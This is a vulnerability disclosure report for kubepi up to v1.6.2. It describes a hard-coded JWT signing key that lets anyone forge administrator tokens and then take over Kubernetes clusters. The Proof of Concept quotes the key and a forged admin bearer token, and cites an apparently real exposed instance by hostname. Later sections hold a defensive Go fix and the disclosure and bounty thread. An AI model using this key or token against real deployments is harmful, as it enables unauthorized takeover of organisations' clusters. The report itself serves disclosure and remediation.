JwtSigKey hardcoded causes the k8s cluster to take over in kubeoperator/kubepi

Valid

Reported on

Jan 2nd 2023


Description

The JWT authentication function of kubepi <= v1.6.2 uses a hard-coded JwtSigKey, so every deployed instance shares the same signing key. This means an attacker can forge any JWT and take over the administrator account of any exposed instance, and then use that administrator access to take over the target enterprise's k8s cluster.

Proof of Concept

The hard-coded JwtSigKey value of kubepi is signature_hmac_secret_shared_key, so forging a token only requires signing it with that key.

Taking the kubepi instance deployed at zhgd-kubepi.xingshicloud.com as an example, an attacker can forge the following JWT:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNjcyNjUxNzc2LCJleHAiOjE3ODM2NTIzNzZ9.i-83qNf6pGJkUYdZCknHeTG6PsYKc1FRyjrRcPJUKvI

After the administrator account has been taken over, the k8s cluster can be taken over as well (screenshot: PoC.png).

Impact

An attacker can forge any JWT and take over the administrator account of any exposed instance, and then use that administrator access to take over the target enterprise's k8s cluster.

Occurrences

The use of a hard-coded JwtSigKey lets an attacker who knows this value forge JWTs at will. The JwtSigKey is a secret and must not be hard-coded in the source.
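As an added defensive illustration (not code from the kubepi project or from this report), the following stdlib-only Go program shows the two things a fix for this class of bug needs: a key loader that refuses to start with the hard-coded value quoted above (or with no key at all), and an HS256 verifier that pins the algorithm, compares the signature in constant time and enforces exp, so that a token signed under any other key is rejected. The environment variable name KUBEPI_JWT_SIGKEY, the 32-byte minimum length and the claim set used in main are assumptions of the example, not values the project defines.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"os"
	"strings"
	"time"
)

// The hard-coded default reported above. It is kept here only so that the key
// loader can refuse it; it must never be used to sign tokens.
const vulnerableDefaultKey = "signature_hmac_secret_shared_key"

// minKeyBytes is an assumed policy value (a 256-bit key for HMAC-SHA256).
const minKeyBytes = 32

// LoadSigningKey turns a configured value (e.g. an environment variable) into an
// HMAC key, rejecting empty values, the known default, and keys that are too short.
func LoadSigningKey(value string) ([]byte, error) {
	switch {
	case value == "":
		return nil, errors.New("jwt signing key is not configured")
	case value == vulnerableDefaultKey:
		return nil, errors.New("jwt signing key is the hard-coded default; generate a per-deployment key")
	case len(value) < minKeyBytes:
		return nil, fmt.Errorf("jwt signing key has %d bytes, need at least %d", len(value), minKeyBytes)
	}
	return []byte(value), nil
}

// GenerateSigningKey returns a fresh random key, to be generated once per
// deployment and stored outside the code base (secret store, env var, mounted file).
func GenerateSigningKey() ([]byte, error) {
	key := make([]byte, minKeyBytes)
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	return key, nil
}

func b64(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

func hs256(key []byte, input string) []byte {
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(input))
	return mac.Sum(nil)
}

// SignHS256 builds a compact JWT (header.payload.signature) with HMAC-SHA256.
func SignHS256(claims map[string]any, key []byte) (string, error) {
	payload, err := json.Marshal(claims)
	if err != nil {
		return "", err
	}
	signingInput := b64([]byte(`{"alg":"HS256","typ":"JWT"}`)) + "." + b64(payload)
	return signingInput + "." + b64(hs256(key, signingInput)), nil
}

// VerifyHS256 accepts a token only if its alg is HS256, its signature matches this
// deployment's key (constant-time compare) and its exp claim is still in the future.
func VerifyHS256(token string, key []byte, now time.Time) (map[string]any, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	headerJSON, err := base64.RawURLEncoding.DecodeString(parts[0])
	if err != nil {
		return nil, err
	}
	var header struct{ Alg string `json:"alg"` }
	if err := json.Unmarshal(headerJSON, &header); err != nil || header.Alg != "HS256" {
		return nil, errors.New("unexpected or missing alg")
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil {
		return nil, err
	}
	if !hmac.Equal(sig, hs256(key, parts[0]+"."+parts[1])) {
		return nil, errors.New("invalid signature")
	}
	payload, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return nil, err
	}
	var claims map[string]any
	if err := json.Unmarshal(payload, &claims); err != nil {
		return nil, err
	}
	exp, ok := claims["exp"].(float64)
	if !ok || !now.Before(time.Unix(int64(exp), 0)) {
		return nil, errors.New("token expired or has no exp")
	}
	return claims, nil
}

func main() {
	// KUBEPI_JWT_SIGKEY is an assumed variable name, not one the project defines.
	key, err := LoadSigningKey(os.Getenv("KUBEPI_JWT_SIGKEY"))
	if err != nil {
		fresh, _ := GenerateSigningKey()
		fmt.Printf("refusing to start: %v\nexample fresh key (hex): %x\n", err, fresh)
		os.Exit(1)
	}
	tok, _ := SignHS256(map[string]any{"name": "admin", "exp": float64(time.Now().Add(time.Hour).Unix())}, key)
	claims, err := VerifyHS256(tok, key, time.Now())
	fmt.Println(claims, err)
}
```

The important property is that the verifier's key is an input to the deployment rather than a constant in the binary: once each instance loads its own key, a token signed under any other key (including a key recovered from the source of another instance) fails the HMAC comparison, and the startup check turns "someone forgot to configure a key" into a refused start rather than a silently shared secret.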

We are processing your report and will contact the kubeoperator/kubepi team within 24 hours. a year ago
无在无不在 modified the report
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the kubeoperator/kubepi team and are waiting to hear back a year ago
无在无不在
a year ago

Researcher


I noticed that kubepi has officially released a bug repair notice; why is the status of the report still awaiting review?

无在无不在
a year ago

Researcher


Am I eligible for the prize pot? :)

kubeoperator/kubepi maintainer validated this vulnerability a year ago
shangrui-hash has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
kubeoperator/kubepi maintainer marked this as fixed in v1.6.3 with commit 3be58b a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
session.go#L35 has been validated
kubeoperator/kubepi maintainer
a year ago

Maintainer


The vulnerability has been fixed and CVE-2023-22463 has been issued, thanks for your report.

无在无不在
a year ago

Researcher


Hi huntr.dev team, I'm confused why the vulnerability was assigned a CVE, but here it says: "This vulnerability will not receive a CVE". Was it an operational error? Could you help me correct this error and assign the CVE to my account? Thank you

Pavlos
a year ago

Admin


It's just that they have assigned a CVE from an external CNA... We will now assign it to your account though :)
